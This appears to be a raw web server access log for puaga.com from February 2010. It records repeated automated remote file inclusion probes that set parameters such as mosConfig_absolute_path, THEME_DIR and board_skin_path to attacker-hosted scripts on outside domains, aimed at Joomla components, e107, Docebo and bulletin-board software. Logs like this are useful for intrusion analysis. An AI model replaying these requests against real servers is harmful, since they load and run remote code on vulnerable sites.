75.125.186.154 - - [19/Feb/2010:08:16:09 -0800] "GET /logs//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:16:09 -0800] "GET /theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:16:10 -0800] "GET /bbs///////board_head.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:16:10 -0800] "GET /logs//bbs///////board_head.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:16:10 -0800] "GET /logs/access_100203.log//bbs///////board_head.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:16:10 -0800] "GET /logs/access_100130.log//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:55 -0800] "GET /pictures/p1/ HTTP/1.0" 302 4581 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:56 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:58 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:58 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:59 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [19/Feb/2010:08:17:59 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
75.125.186.154 - - [19/Feb/2010:08:18:36 -0800] "GET /logs/access_100124.log%20%20//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:08:18:39 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:08:18:39 -0800] "GET /logs/access_100115.log//e107/e107_handlers/secure_img_render.php?p=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:08:18:39 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:18:44 -0800] "GET /logs/access_100203.log%20%20//bbs///////board_head.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:08 -0800] "GET /logs/access_100208.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:08 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:08 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:25 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:25 -0800] "GET /logs/access_100208.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:25 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:46 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:46 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:19:46 -0800] "GET /logs/access_100208.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:20:08 -0800] "GET /?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:20:08 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:20:08 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:20:39 -0800] "GET /logs/access_100124.log%20%20//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:21:13 -0800] "GET /logs/access_100124.log//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:21:31 -0800] "GET /logs/access_100119.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:07 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:07 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:11 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.52.167.61 - - [19/Feb/2010:08:22:12 -0800] "GET /appserv/main.php?appserv_root=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
212.52.167.61 - - [19/Feb/2010:08:22:12 -0800] "GET /appserv/main.php?appserv_root=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
212.52.167.61 - - [19/Feb/2010:08:22:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
212.52.167.61 - - [19/Feb/2010:08:22:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:22:23 -0800] "GET /logs/access_100119.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:22:33 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:22:33 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:22:34 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:44 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:44 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:45 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:46 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:46 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:22:47 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:22:47 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:22:52 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:08:22:59 -0800] "GET /logs//?pagina=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:08:22:59 -0800] "GET /?pagina=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:08:22:59 -0800] "GET /logs//?pagina=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
189.14.103.146 - - [19/Feb/2010:08:23:00 -0800] "GET /?pagina=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:23:01 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:23:19 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:23:19 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:23:20 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:23:20 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:23:24 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:24:20 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:24:20 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:24:20 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:24:35 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:24:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:24:35 -0800] "GET /?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:24:53 -0800] "GET /logs/access_100119.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:25:24 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:25:46 -0800] "GET /logs/access_100208.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:25:46 -0800] "GET /logs/access_100205.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:25:46 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:25:46 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:25:54 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:08:26:02 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:08:26:02 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:26:12 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:26:12 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:26:12 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:26:23 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:26:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:26:35 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:26:36 -0800] "GET /?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:27:13 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:27:43 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:27:53 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:28:28 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:28:37 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:29:13 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:29:17 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [19/Feb/2010:08:34:13 -0800] "GET /logs/access_100206.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.appnews.co.kr/bbs/bbs//.xB??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [19/Feb/2010:08:34:14 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.appnews.co.kr/bbs/bbs//.xB??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [19/Feb/2010:08:34:15 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.appnews.co.kr/bbs/bbs//.xB??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:08:34:54 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:35:47 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.32 - - [19/Feb/2010:08:36:14 -0800] "GET / HTTP/1.0" 200 8140 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {7D1A3D76-11AB-9EF8-2EC4-A3E43F86910C}; FunWebProducts; ZangoToolbar 4.8.3)" "pixero.puaga.com"
210.114.222.95 - - [19/Feb/2010:08:36:17 -0800] "GET /logs/access_100121.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.appnews.co.kr/bbs/bbs//.xB??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:36:33 -0800] "GET /logs/access_100123.log//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:36:33 -0800] "GET /components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [19/Feb/2010:08:36:33 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php/vidinas.net/t/variant-1.ru/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:37:40 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:37:40 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:37:40 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:08:38:23 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:38:38 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [19/Feb/2010:08:38:45 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:39:07 -0800] "GET /logs/access_100126.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.222.124.71 - - [19/Feb/2010:08:39:12 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
